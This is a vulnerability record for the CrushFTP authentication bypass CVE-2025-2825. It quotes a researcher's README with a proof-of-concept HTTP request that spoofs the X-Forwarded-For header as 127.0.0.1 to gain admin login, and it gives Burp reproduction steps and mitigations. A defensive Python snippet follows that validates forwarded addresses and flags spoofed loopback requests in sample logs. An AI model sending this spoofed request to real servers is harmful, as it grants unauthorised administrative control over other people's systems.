CrushFTP Authentication Bypass Vulnerability
Vulnerability information
Vulnerability name: CrushFTP Authentication Bypass Vulnerability
Vulnerability ID:
- CVE: CVE-2025-2825
Vulnerability type: Privilege bypass
Severity: Critical
Vulnerability description: CrushFTP is a widely used secure file transfer server that provides an efficient file transfer solution and is commonly deployed in enterprise environments to share and transfer files securely. Because of its broad adoption, the impact of this vulnerability is extensive.
This is an authentication bypass vulnerability. Its technical root cause is insufficient validation of the X-Forwarded-For header by the server. When an attacker sets that header to 127.0.0.1, the server wrongly treats the request as originating from the local host and skips the normal authentication checks, allowing the attacker to obtain administrator privileges without valid credentials.
The security risk is extremely high: an attacker can exploit this vulnerability remotely, without any form of authentication, to take full control of an affected CrushFTP server. This may lead to leakage of sensitive data, service disruption, and even use of the server as a pivot for further attacks. Because exploitation is simple and automated tooling is easy to develop, the vulnerability is expected to be widely exploited.
Vendor: CrushFTP
Product: CrushFTP
Affected versions: version < 10.6.0
Source: https://github.com/Shivshantp/CVE-2025-2825-CrushFTP-AuthBypass
Type: CVE-2025:github search
Repository files
- README.md
Source overview
🚨 CVE-2025-2825 – CrushFTP Authentication Bypass
Overview
CVE-2025-2825 is a critical authentication bypass vulnerability affecting CrushFTP, a widely used secure file transfer server. The flaw allows remote attackers to bypass login authentication and gain administrative access by spoofing headers — essentially tricking the server into thinking the request came from the localhost.
- Severity: Critical
- CVSS Score: 9.8
- Attack Vector: Remote
- Affected Versions: CrushFTP < v10.6.0
- Fixed In: v10.6.0 and above
- Status: Under active exploitation in the wild
🔍 Technical Details
The vulnerability is due to insufficient validation of the X-Forwarded-For header. When this header is set to 127.0.0.1, the server trusts the request as if it originated locally, bypassing authentication checks.
🧪 Proof of Concept (PoC)
HTTP Request Example:
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1
📝 Replace target-ip with the target server's IP.
If successful, the server will treat the request as local and allow administrative login — even with incorrect credentials.
🛠️ Tools & Technologies Used
- Python – for automation and script testing
- Burp Suite – intercept and modify HTTP headers
- Wireshark – network analysis and monitoring
- Nmap – port and service detection
- CrushFTP – vulnerable instance (v10.5 or older)
- GitHub – for documentation and PoC publication
📌 Steps to Reproduce
- Set up a vulnerable instance of CrushFTP (v10.5 or below).
- Open Burp Suite and intercept the login request.
- Modify the HTTP header:
X-Forwarded-For: 127.0.0.1
- Forward the request.
- Observe that the authentication is bypassed, and admin access is granted.
✅ Mitigation
- Upgrade to CrushFTP v10.6.0 or later.
- Block or sanitize trusted headers like X-Forwarded-For.
- Restrict access to admin interfaces via firewall or VPN.
- Monitor logs for unusual access from 127.0.0.1.
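The root cause described in the Technical Details section and the last two mitigation items (sanitizing X-Forwarded-For and monitoring logs for spoofed 127.0.0.1) can be made concrete in code. The following is an added example written for this page; it is not part of the repository above and not CrushFTP's own code. It assumes a hypothetical log format (peer address, X-Forwarded-For value, request line, status) and a hypothetical trusted reverse-proxy address 10.0.0.5; the log lines are constructed samples. It shows the safe way to derive a client address (only honour X-Forwarded-For when the TCP peer is a configured proxy, and never accept a loopback address from the header) and a detector that flags requests whose header claims 127.0.0.1 while the actual peer is external.

```python
import ipaddress
import re
from typing import Iterable, List, Optional, Tuple

# Constructed sample log lines (not real CrushFTP logs): "<peer> xff="<header>" "<request>" <status>"
SAMPLE_LOG = [
    '203.0.113.10 xff="-" "GET /WebInterface/login.html?command=validate" 401',
    '203.0.113.55 xff="127.0.0.1" "GET /WebInterface/login.html?command=validate" 200',
    '10.0.0.5 xff="198.51.100.7" "GET /WebInterface/" 200',
    '10.0.0.5 xff="127.0.0.1" "GET /WebInterface/login.html?command=validate" 200',
]

# Hypothetical reverse proxy in front of the application; only its XFF values are honoured.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}

LOG_RE = re.compile(
    r'^(?P<peer>\S+) xff="(?P<xff>[^"]*)" "(?P<req>[^"]*)" (?P<status>\d{3})$'
)


def _parse_ip(text: str):
    """Return an ip_address object or None for unparseable input."""
    try:
        return ipaddress.ip_address(text.strip())
    except ValueError:
        return None


def effective_client_ip(remote_addr: str, xff: Optional[str], trusted_proxies=TRUSTED_PROXIES):
    """Address to base trust decisions on.

    The header is ignored unless the TCP peer is a configured proxy. Even then only the
    right-most entry (appended by that proxy) is used, and a loopback value is rejected,
    because a proxy never legitimately forwards 127.0.0.1 for an external client.
    """
    peer = ipaddress.ip_address(remote_addr)
    if peer not in trusted_proxies or not xff or xff == "-":
        return peer
    forwarded = _parse_ip(xff.split(",")[-1])
    if forwarded is None or forwarded.is_loopback:
        return peer
    return forwarded


def is_local_request(remote_addr: str, xff: Optional[str], trusted_proxies=TRUSTED_PROXIES) -> bool:
    """True only when the request genuinely comes from the loopback interface."""
    return effective_client_ip(remote_addr, xff, trusted_proxies).is_loopback


def spoofed_loopback_events(lines: Iterable[str]) -> List[Tuple[str, str, int]]:
    """Flag log entries where X-Forwarded-For claims a loopback address but the
    peer is not loopback; these are the requests the mitigation says to monitor for."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the scan
        peer = _parse_ip(m["peer"])
        if peer is None or m["xff"] == "-":
            continue
        claims_loopback = any(
            (ip := _parse_ip(entry)) is not None and ip.is_loopback
            for entry in m["xff"].split(",")
        )
        if claims_loopback and not peer.is_loopback:
            hits.append((str(peer), m["req"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for peer, req, status in spoofed_loopback_events(SAMPLE_LOG):
        print(f"spoofed loopback from {peer}: {req} -> {status}")
```

Running the block prints the two sample entries whose header claims 127.0.0.1 from a non-loopback peer; note that the entry relayed by the trusted proxy is still flagged, because a loopback value is never a legitimate forwarded client address. The status column is kept in the output so that a 200 on the login validate request, rather than a 401, stands out as the case worth investigating.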
👨💻 Author
Shivshant Patil
Certified Ethical Hacker (CEH v13)
B.Tech Computer Engineering Graduate
LinkedIn Profile